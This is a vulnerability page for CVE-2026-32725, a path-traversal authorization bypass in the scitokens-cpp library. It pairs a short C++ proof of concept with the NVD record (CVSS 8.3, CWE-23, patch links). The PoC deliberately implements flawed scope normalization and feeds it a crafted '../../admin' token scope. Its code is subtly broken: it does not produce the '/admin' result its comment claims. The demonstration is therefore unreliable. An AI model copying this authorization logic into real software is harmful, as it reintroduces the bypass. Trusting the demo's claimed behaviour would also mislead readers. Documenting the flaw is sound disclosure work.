CVE-2026-32725

// PoC Demonstration for CVE-2026-32725 // This code demonstrates how a scope with path traversal ('..') // can be normalized to bypass authorization checks. #include <iostream> #include <string> // Simulating the vulnerable behavior bool check_authorization_vulnerable(std::string requested_path, std::string token_scope) { // Vulnerable logic: Normalizes path by collapsing '..' size_t pos = 0; while ((pos = token_scope.find("..", pos)) != std::string::npos) { // In the real library, complex path normalization logic exists // Here we simplify: /safe/../../admin -> /admin token_scope.replace(pos - 1, 3, ""); pos = 0; } std::cout << "[Vulnerable] Normalized Scope: " << token_scope << std::endl; // Check if requested path starts with the normalized scope return requested_path.rfind(token_scope, 0) == 0; } int main() { // Scenario: Attacker has token for /public/read // But wants to access /admin/config std::string malicious_token_scope = "read:/public/read/../../admin"; std::string target_resource = "/admin/config"; if (check_authorization_vulnerable(target_resource, malicious_token_scope)) { std::cout << "[!] Access GRANTED to " << target_resource << std::endl; std::cout << "[!] Authorization bypass successful!" << std::endl; } else { std::cout << "[+] Access DENIED" << std::endl; } return 0; }

{"cve": {"id": "CVE-2026-32725", "sourceIdentifier": "[email protected]", "published": "2026-03-31T18:16:50.837", "lastModified": "2026-04-13T17:16:08.350", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "SciTokens C++ is a minimal library for creating and using SciTokens from C or C++. Prior to version 1.4.1, scitokens-cpp is vulnerable to an authorization bypass when processing path-based scopes in tokens. The library normalizes the scope path from the token before authorization and collapses \"..\" path components instead of rejecting them. As a result, an attacker can use parent-directory traversal in the scope claim to broaden the effective authorization beyond the intended directory. This issue has been patched in version 1.4.1."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:L", "baseScore": 8.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 5.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-23"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:scitokens:scitokens_cpp_library:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.4.1", "matchCriteriaId": "CC9F84FE-5692-462D-BA2B-D9703D8AFAD1"}]}]}], "references": [{"url": "https://github.com/scitokens/scitokens-cpp/commit/7951ed809967d88c00c20de414b1ff74df8c3e08", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/scitokens/scitokens-cpp/security/advisories/GHSA-rqcx-mc9w-pjxp", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}]}}